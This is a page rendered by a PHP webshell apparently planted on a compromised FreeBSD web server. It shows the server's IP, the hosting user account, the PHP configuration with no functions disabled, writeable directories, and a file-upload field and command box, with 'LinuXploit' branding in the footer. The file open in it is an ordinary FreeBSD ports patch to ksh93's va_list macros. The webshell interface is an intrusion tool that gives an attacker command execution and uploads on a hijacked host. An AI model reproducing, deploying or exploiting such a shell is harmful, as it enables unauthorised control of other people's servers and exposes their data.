403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/shells/ksh93/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/shells/ksh93/files/patch-src_lib_libast_features_common
--- src/lib/libast/features/common.orig	2017-11-09 11:01:26.000000000 -0800
+++ src/lib/libast/features/common	2020-02-22 20:00:11.166985000 -0800
@@ -518,29 +518,12 @@
 		printf("#include <varargs.h>\n");
 		printf("#endif\n");
 		printf("#endif\n");
-	#if TRY == 4
-		printf("#define va_listref(p) (&(p))\t");
-			printf("/* pass va_list to varargs function */\n");
-		printf("#define va_listval(p) (*(p))\t");
-			printf("/* retrieve va_list from va_arg(ap,va_listarg) */\n");
-		printf("#define va_listarg va_list*\t");
-			printf("/* va_arg() va_list type */\n");
-	#else
-		varyfunny(&r);
-		printf("#define va_listref(p) (p)\t");
-			printf("/* pass va_list to varargs function */\n");
-		if (sizeof(va_list) > sizeof(void*))
-			printf("#define va_listval(p) (*(p))\t");
-		else
-			printf("#define va_listval(p) (p)\t");
-			printf("/* retrieve va_list from va_arg(ap,va_listarg) */\n");
-	#if TRY == 2
-		printf("#define va_listarg va_list*\t");
-	#else
-		printf("#define va_listarg va_list\t");
-	#endif /*TRY == 2*/
-			printf("/* va_arg() va_list type */\n");
-	#endif /*TRY == 4*/
+	printf("#define va_listref(p) (&(p))\t");
+		printf("/* pass va_list to varargs function */\n");
+	printf("#define va_listval(p) (*(p))\t");
+		printf("/* retrieve va_list from va_arg(ap,va_listarg) */\n");
+	printf("#define va_listarg va_list*\t");
+		printf("/* va_arg() va_list type */\n");
 	
 	#if _UWIN
 		printf("#ifndef va_copy\n");

Youez - 2016 - github.com/yon3zu
LinuXploit